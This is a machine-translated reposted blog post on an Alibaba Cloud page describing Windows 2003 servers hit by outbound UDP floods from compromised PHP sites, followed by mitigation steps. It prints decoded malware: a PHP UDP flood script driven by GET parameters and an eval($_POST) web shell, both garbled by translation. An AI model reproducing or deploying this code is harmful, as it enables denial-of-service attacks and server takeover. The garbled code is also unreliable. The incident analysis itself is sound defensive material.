Win2003 is suffering from UDP attacks resulting in a large bandwidth footprint _win server

Source: Internet
Author: User
Tags eval rand
Later found in a Web site to find an encrypted. After the decryption to see the familiar UDP is not related? Sure enough, there are friends in this situation, it seems that the ban on external UDP is very necessary,

The following is reprint:

About recent servers suffering from a UDP attack description
Recently, I have one or two servers showing frequent UDP attacks.
Causes the server bandwidth to occupy to 100%, uses the Chinese shield to check the traffic usage to be unable to find out exactly which station was attacked, originally thought is the CC attack, because stopped the IIS bandwidth to be 0, actually is not, is the partial user is invaded caused
Now I'd like to say a little bit about the invasion.
The original code for a PHP page in the user program:
Eval (gzinflate Base64_decode ('
After the N-time decryption code:
Copy Code code as follows:

$packets = 0;
$ip = $_get[\ ' ip\ '];
$rand = $_get[\ ' port\ '];
Set_time_limit (0);
Ignore_user_abort (FALSE);
$exec _time = $_get[\ ' time\ '];
$time = time ();
Print \ "Flooded: $ip on port $rand <br><br>\";
$max _time = $time + $exec _time;

For ($i =0 $i <65535; $i + +) {
$out. = \ "X\";
while (1) {
$packets + +;
if (Time () > $max _time) {
$fp = Fsockopen (\ "udp://$ip \", $rand, $errno, $ERRSTR, 5);
if ($fp) {
Fwrite ($fp, $out);
Fclose ($FP);
echo \ "Packet complete at \". Time (\ ' h:i:s\ '). \ "with $packets (\". Round (($packets *65)/1024, 2). \ mB Packets G \ ". Round ($packets/$exec _time, 2). \ "PACKETS/S \\n\";
<?php eval ($_post[ddos])?>

Baidu a little bit work principle:
Put your code in a normal Web page first.
The IP and port is opened via a URL in UDP. pass file to server write.
So the server was recruited.
That is, the server shows UDP attacks, bandwidth consumption is very serious, the basic is 100%, generally hovering between 97%-99%
Restrict PHP to network in php.ini.
Set its value to off in php.ini
Allow_url_fopen = Off
; Extension=php_sockets.dll
The front of the number must have, meaning is to limit the use of Sockets.dll
Then restart IIS
I did not close this function, some programs need to look like, directly to the UDP outbound port to seal.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.